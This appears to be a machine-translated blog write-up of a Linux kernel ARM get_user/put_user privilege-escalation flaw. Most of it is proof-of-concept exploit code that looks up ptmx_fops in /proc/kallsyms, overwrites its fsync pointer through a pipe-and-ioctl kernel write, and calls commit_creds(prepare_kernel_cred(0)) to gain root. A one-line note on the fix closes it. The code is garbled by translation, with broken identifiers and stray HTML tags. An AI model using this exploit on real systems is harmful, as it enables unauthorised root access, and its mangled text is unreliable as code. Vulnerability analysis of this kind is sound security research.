/*
This article is prepared by Mo Gray Ash, reproduced please indicate the source.
mo Ash Gray mailbox: [email protected]
*/
1. Causes of vulnerability
Linux kernel does not have access to the Get_user/put_user on arm, and local attackers can exploit this vulnerability to read and write kernel memory for elevation of privilege.
2. Affected Systems
Linux kernel 3.2.2
Linux Kernel 3.2.13
Linux Kernel 3.2.1
3.PoC Analysis
(1) Get the address of the data structure Ptmx_fops from the/proc/kallsyms file
void *ptmx_fops = Kallsyms_get_symbol_address ("Ptmx_fops"); unsigned int ptmx_fops_fsync_address = (unsigned int) ptmx_ FoPs + 0x38;
static void *kallsyms_get_symbol_address (const char *symbol_name) {FILE *fp;char function[bufsiz];char symbol;void * Address;int RET;FP = fopen ("/proc/kallsyms", "R"), if (!FP) {printf ("Failed to open/proc/kallsyms due to%s.", Strerror (er Rno)); return 0;} while (!feof (FP)) {ret = fscanf (FP, "%p%c%s", &address, &symbol, function); if (ret! = 3) {break;} if (!strcmp (function, symbol_name)) {fclose (FP); return address;}} Fclose (FP); return NULL;}
(2) Find the address of Fsync, the place of ptmx_fops+0x38
static struct file_operations ptmx_fops;
struct File_operations {struct module *owner;loff_t (*llseek) (struct file *, loff_t, int), ssize_t (*read) (struct file *, Char __user *, size_t, loff_t *), ssize_t (*write) (struct file *, const char __user *, size_t, loff_t *); ssize_t (*aio_re AD) (struct KIOCB *, const struct IOVEC *, unsigned long, loff_t); ssize_t (*aio_write) (struct KIOCB *, const struct IOVEC *, unsigned long, loff_t), int (*iterate) (struct file *, struct dir_context *); unsigned int (*poll) (struct file *, Struc T poll_table_struct *); Long (*unlocked_ioctl) (struct file *, unsigned int, unsigned long), Long (*compat_ioctl) (struct fi Le *, unsigned int, unsigned long), int (*mmap) (struct file *, struct vm_area_struct *); int (*open) (struct inode *, Struc T file *); int (*flush) (struct file *, fl_owner_t ID); int (*release) (struct inode *, struct file *); int (*fsync) (struct File *, loff_t, loff_t, int datasync); int (*aio_fsync) (struct KIOCB *, int datasync); <span style= "color: #ff0000;" ><strong>int (*fasync) (int, struct file *, int); </strong></span>int (*lock) (struct file *, int, struct file_lock *); ssize_t (*se ndpage) (struct file *, struct page *, int, size_t, loff_t *, int); unsigned long (*get_unmapped_area) (struct file *, Unsig Ned Long, unsigned long, unsigned long, unsigned long); int (*check_flags) (int); int (*flock) (struct file *, int, struct FI Le_lock *); ssize_t (*splice_write) (struct pipe_inode_info *, struct file *, loff_t *, size_t, unsigned int); ssize_t (*spli Ce_read) (struct file *, loff_t *, struct pipe_inode_info *, size_t, unsigned int); int (*setlease) (struct file *, long, str UCT File_lock *); Long (*fallocate) (struct file *file, int mode, loff_t offset, loff_t len), int (*show_fdinfo) (struct SEQ _file *m, struct file *f);};
(3) Replace the Fsync function pointer for its own function
if (Pipe_write_value_at_address (ptmx_fops_fsync_address, (unsigned int) &ptmx_fsync_callback)) {
The Ptmx_fsync_callback function enables this process to gain permission
/* Obtain_root_privilege-userland callback Functionwe set Ptmx_fops.fsync to the address of this functioncalling fysnc o n the open/dev/ptmx file descriptor would resultin this function being called in the kernel Contextwe can the call the pre Pare/commit creds combo to escalate theprocesses priveledge.*/static void ptmx_fsync_callback (void) {commit_creds ( Prepare_kernel_cred (0));}
pipe_write_value_at_address function overrides kernel address content with Put_user function
static unsigned int pipe_write_value_at_address (unsigned long address, unsigned int value) {char data[4];int pipefd[2]; int i;* (long *) &data = value;if (pipe (PIPEFD) = =-1) {perror ("pipe"); return 1;} for (i = 0; i < (int) sizeof (data); i++) {char buf[256];buf[0] = 0;if (Data[i]) {if (write (pipefd[1], buf, data[i])! = Data[i]) {printf ("Error in write () \ n"); break;}} if (IOCTL (pipefd[0], fionread, (void *) (address + i)) = =-1) {perror ("ioctl"); if (Data[i]) {if (read (pipefd[0], buf, sizeof buf)! = Data[i]) {printf ("Error in read () \ n"); Close (pipefd[0]); Close (pipefd[1]); return (i = = sizeof (data));}
(4) Call the Fsync function manually, trigger its own hook function, get permission elevation
int fd = open (Ptmx_device, o_wronly); if (!FD) return 1; Fsync (FD); close (FD);
4. Repair
Added an address inference before put_user.